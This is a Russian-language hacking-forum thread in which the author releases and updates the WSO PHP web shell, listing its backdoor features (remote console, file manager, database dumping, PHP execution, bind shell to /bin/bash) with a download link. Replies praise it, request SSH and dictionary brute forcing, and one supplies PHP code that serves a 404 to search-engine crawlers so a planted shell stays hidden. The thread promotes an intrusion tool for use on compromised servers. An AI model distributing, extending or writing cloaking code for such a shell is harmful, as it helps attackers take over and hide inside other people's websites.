HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи > Избранное
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

WSO - веб-шелл
  #1  
Старый 26.01.2009, 12:21
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию WSO - веб-шелл

WSO2.4
Описание:
  • Авторизация
  • Информация о сервере
  • Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
  • Просмотр, hexview, редактирование, давнлоад, аплоад файлов
  • Работа с zip архивами (упаковка, распаковка)
  • Консоль
  • SQL менеджер (MySql, PostgreSql)
  • Выполнение PHP кода
  • Работа со строками + поиск хеша в онлайн базах
  • Биндпорт и бек-коннект (Perl)
  • Поиск текста в файлах
  • *nix/Windows
Из фишек
  • Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
  • Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
  • Можно использовать AJAX
  • Малый вес (24.32 KB)
  • Выбор кодировки, в которой работает шелл.

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Скачать: http://narod.ru/disk/18331224000/wso2.4.zip.html
Архив содержит последнюю версию шелла и небольшую тулзу WSOmanager - для работы с шеллами.

Последний раз редактировалось oRb; 01.06.2010 в 15:41..
 
Ответить с цитированием

  #2  
Старый 04.02.2009, 12:16
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию

Обновление:
  • Пофиксил баги
  • Мелкие исправления:
    - clear теперь очищает консоль, не делая запрос на сервер
    - При изменении кодировки, соединение с мускулом не "сбрасывается".
  • Добавлены
    - Bind port to /bin/bash
    - изменение даты модификации файла
  • Упаковал. Теперь вес (16 кб)
Первый пост обновил.

UPD:
еще несколько фиксов.
Спасибо: b3

Последний раз редактировалось oRb; 04.02.2009 в 13:17..
 
Ответить с цитированием

  #3  
Старый 20.02.2009, 17:56
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию

Обновление:
  • Уменьшен размер кода, генерируемого файловым менеджером
  • Добавлен новый сервис для расшифровки хеша
  • В файловом менеджере можно применять сортировки к столбцам
  • В SQL менеджере новый вывод таблиц (более наглядный, подсчет записей в каждой таблице)
  • Записи с длинным полями отображаются в компактном виде
  • Сделал возможность дампа бд. Можно выбирать конкретные таблицы.
  • В меню выделяется раздел, в котором находишься
  • Все формы в разделе Tools теперь нормальные (отправляются по enter'у)
  • Код местами переписан, + исправлены мелкие баги.

Отредактировал первый пост.
 
Ответить с цитированием

  #4  
Старый 24.02.2009, 10:59
x-demon
Постоянный
Регистрация: 10.06.2007
Сообщений: 476
С нами: 9957986

Репутация: 299
По умолчанию

Отличная вещь. дизайн бы правда сменить
 
Ответить с цитированием

  #5  
Старый 24.02.2009, 22:06
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию

Цитата:
Сообщение от x-demon  
дизайн бы правда сменить
Скоро займусь 2й версией. По планам много будет изменено, дизайн в том числе.
 
Ответить с цитированием

  #6  
Старый 24.02.2009, 23:47
heretic1990
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
С нами: 9399011

Репутация: 444
Exclamation

Цитата:
Сообщение от x-demon  
Отличная вещь. дизайн бы правда сменить
главное не дизайн, а функционал.

п.с. зачётный шелл!
 
Ответить с цитированием

  #7  
Старый 26.02.2009, 00:36
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию

Небольшие фиксы:
- нормальная работа при safe-mode
- после соединения с mysql сервером, кодировка устанавливалась с помощью функции mysql_set_charset. Почитал мануал повнимательней: PHP 5 >= 5.2.3. Пофиксил.
 
Ответить с цитированием

  #8  
Старый 20.09.2009, 01:32
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Да... пришёл к выводу, что этот шелл по всем параметрам превзошёл великий c99.
Полностью перехожу на него. На мой взгляд равных нету.

Только пару существенных замечаний. Было бы неплохо если убрать из шелла HTML вставки, сделав чистый php код. Уже было пара случаев, когда при особых условиях на сервере шелл не пахал. Пришлось самому убирать вставки, конечно это ИМХО, но всё-же было бы неплохо, если бы их не было.

Ну и ещё сделать 404 для всех поисковиков, а не только для гугла, php код:
Код:
 if(strpos($_SERVER['HTTP_USER_AGENT'], 'Yandex') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'YaDirectBot') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'James Bond') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'Rambler') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
if(strpos($_SERVER['HTTP_USER_AGENT'], 'ia_archiver') !== false){ 
header("HTTP/1.0 404 Not Found");
die;
}
 
Ответить с цитированием

  #9  
Старый 21.03.2009, 14:28
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Опаньки)Ща испробуем.Будет ещё обновляться что-нить ?)

1)Или мне кажется,или r99 быстрее)
2) Я за смену дизайна(как у эрки) ).
3) Хорошо б замутить брут ssh+Брут по словарю))))))))
4)Бэкконекта чет не вижу,а вот биндя есть.


ЗЫ:Лови плюськи )

Обновляемый проект - хороший проект))).Буду(лично я - да) ждать с ультрамеганетерпением

Последний раз редактировалось Велемир; 21.03.2009 в 14:48..
 
Ответить с цитированием

  #10  
Старый 21.03.2009, 17:16
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию

Цитата:
Будет ещё обновляться что-нить ?)
Да, сейчас пишу вторую версию (переписываю с нуля). Будет заметно больше функционала, обновленный диз и нормальная кроссплатформенность.
Цитата:
1)Или мне кажется,или r99 быстрее)
не совсем понял, что ты имел в виду (c99 или r57). Все зависит от много, в том числе, какой именно функционал шелла используется. Но по скорости они не должны заметно отличаться.
Цитата:
3) Хорошо б замутить брут ssh+Брут по словарю))))))))
по словарю будет, ssh - посмотрим.
Цитата:
4)Бэкконекта чет не вижу,а вот биндя есть
да, его там нет, сам его написать не мог, а чужой код вставлять не хотелось.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета. SK | Heaton Мировые новости. Обсуждения. 5 13.06.2007 02:07
Переделанный шелл! k1b0rg PHP 33 03.04.2007 08:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.